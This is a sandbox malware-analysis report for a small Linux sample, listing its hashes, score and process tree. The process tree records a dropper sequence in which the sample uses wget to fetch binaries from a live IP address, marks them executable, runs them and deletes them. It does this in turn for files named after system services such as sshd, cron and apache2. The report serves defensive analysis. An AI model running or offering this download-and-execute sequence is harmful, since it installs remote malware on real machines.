81118e5a27c142cbd98c48d022eb6cf09b9c60bfe8563bf222fec635545c02a7

Analysis

max time kernel
4s
max time network
128s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
10/05/2024, 04:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2d588cb9e12d0096c7143f281e3421c2_JaffaCakes118
Size

1KB
MD5

2d588cb9e12d0096c7143f281e3421c2
SHA1

3a8659922c869e610a39ba531b76136ded640ca6
SHA256

81118e5a27c142cbd98c48d022eb6cf09b9c60bfe8563bf222fec635545c02a7
SHA512

d1d0974e7a452544e3f730804fa805ad7f4519d52f036c925e8a6aece1d7247d0b134d8c64313a1b64d3dda8329834b6c987d7940066db52470d106a193a8990

Score

1^/10

Malware Config

Signatures

/tmp/2d588cb9e12d0096c7143f281e3421c2_JaffaCakes118
/tmp/2d588cb9e12d0096c7143f281e3421c2_JaffaCakes118
1⤵
PID:1509
- /usr/bin/wget
  wget http://198.199.111.46/cuntyntpd
  2⤵
  PID:1510
- /bin/chmod
  chmod +x cuntyntpd
  2⤵
  PID:1514
- /tmp/cuntyntpd
  ./cuntyntpd
  2⤵
  PID:1515
- /bin/rm
  rm -rf cuntyntpd
  2⤵
  PID:1516
- /usr/bin/wget
  wget http://198.199.111.46/cuntysshd
  2⤵
  PID:1517
- /bin/chmod
  chmod +x cuntysshd
  2⤵
  PID:1518
- /tmp/cuntysshd
  ./cuntysshd
  2⤵
  PID:1519
- /bin/rm
  rm -rf cuntysshd
  2⤵
  PID:1520
- /usr/bin/wget
  wget http://198.199.111.46/cuntyopenssh
  2⤵
  PID:1521
- /bin/chmod
  chmod +x cuntyopenssh
  2⤵
  PID:1522
- /tmp/cuntyopenssh
  ./cuntyopenssh
  2⤵
  PID:1523
- /bin/rm
  rm -rf cuntyopenssh
  2⤵
  PID:1524
- /usr/bin/wget
  wget http://198.199.111.46/cuntybash
  2⤵
  PID:1525
- /bin/chmod
  chmod +x cuntybash
  2⤵
  PID:1526
- /tmp/cuntybash
  ./cuntybash
  2⤵
  PID:1527
- /bin/rm
  rm -rf cuntybash
  2⤵
  PID:1528
- /usr/bin/wget
  wget http://198.199.111.46/cuntytftp
  2⤵
  PID:1529
- /bin/chmod
  chmod +x cuntytftp
  2⤵
  PID:1530
- /tmp/cuntytftp
  ./cuntytftp
  2⤵
  PID:1531
- /bin/rm
  rm -rf cuntytftp
  2⤵
  PID:1532
- /usr/bin/wget
  wget http://198.199.111.46/cuntywget
  2⤵
  PID:1533
- /bin/chmod
  chmod +x cuntywget
  2⤵
  PID:1534
- /tmp/cuntywget
  ./cuntywget
  2⤵
  PID:1535
- /bin/rm
  rm -rf cuntywget
  2⤵
  PID:1536
- /usr/bin/wget
  wget http://198.199.111.46/cuntycron
  2⤵
  PID:1537
- /bin/chmod
  chmod +x cuntycron
  2⤵
  PID:1538
- /tmp/cuntycron
  ./cuntycron
  2⤵
  PID:1539
- /bin/rm
  rm -rf cuntycron
  2⤵
  PID:1540
- /usr/bin/wget
  wget http://198.199.111.46/cuntyftp
  2⤵
  PID:1541
- /bin/chmod
  chmod +x cuntyftp
  2⤵
  PID:1542
- /tmp/cuntyftp
  ./cuntyftp
  2⤵
  PID:1543
- /bin/rm
  rm -rf cuntyftp
  2⤵
  PID:1544
- /usr/bin/wget
  wget http://198.199.111.46/cuntypftp
  2⤵
  PID:1545
- /bin/chmod
  chmod +x cuntypftp
  2⤵
  PID:1546
- /tmp/cuntypftp
  ./cuntypftp
  2⤵
  PID:1547
- /bin/rm
  rm -rf cuntypftp
  2⤵
  PID:1548
- /usr/bin/wget
  wget http://198.199.111.46/cuntysh
  2⤵
  PID:1549
- /bin/chmod
  chmod +x cuntysh
  2⤵
  PID:1550
- /tmp/cuntysh
  ./cuntysh
  2⤵
  PID:1551
- /bin/rm
  rm -rf cuntysh
  2⤵
  PID:1552
- /usr/bin/wget
  wget http://198.199.111.46/cuntyshit
  2⤵
  PID:1553
- /bin/chmod
  chmod +x cuntyshit
  2⤵
  PID:1554
- /tmp/cuntyshit
  ./cuntyshit
  2⤵
  PID:1555
- /bin/rm
  rm -rf cuntyshit
  2⤵
  PID:1556
- /usr/bin/wget
  wget http://198.199.111.46/cuntyapache2
  2⤵
  PID:1557
- /bin/chmod
  chmod +x cuntyapache2
  2⤵
  PID:1558
- /tmp/cuntyapache2
  ./cuntyapache2
  2⤵
  PID:1559
- /bin/rm
  rm -rf cuntyapache2
  2⤵
  PID:1560
- /usr/bin/wget
  wget http://198.199.111.46/cuntytelnetd
  2⤵
  PID:1561
- /bin/chmod
  chmod +x cuntytelnetd
  2⤵
  PID:1562
- /tmp/cuntytelnetd
  ./cuntytelnetd
  2⤵
  PID:1563
- /bin/rm
  rm -rf cuntytelnetd
  2⤵
  PID:1564

Windows 7 deprecation

Loading Replay Monitor...

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads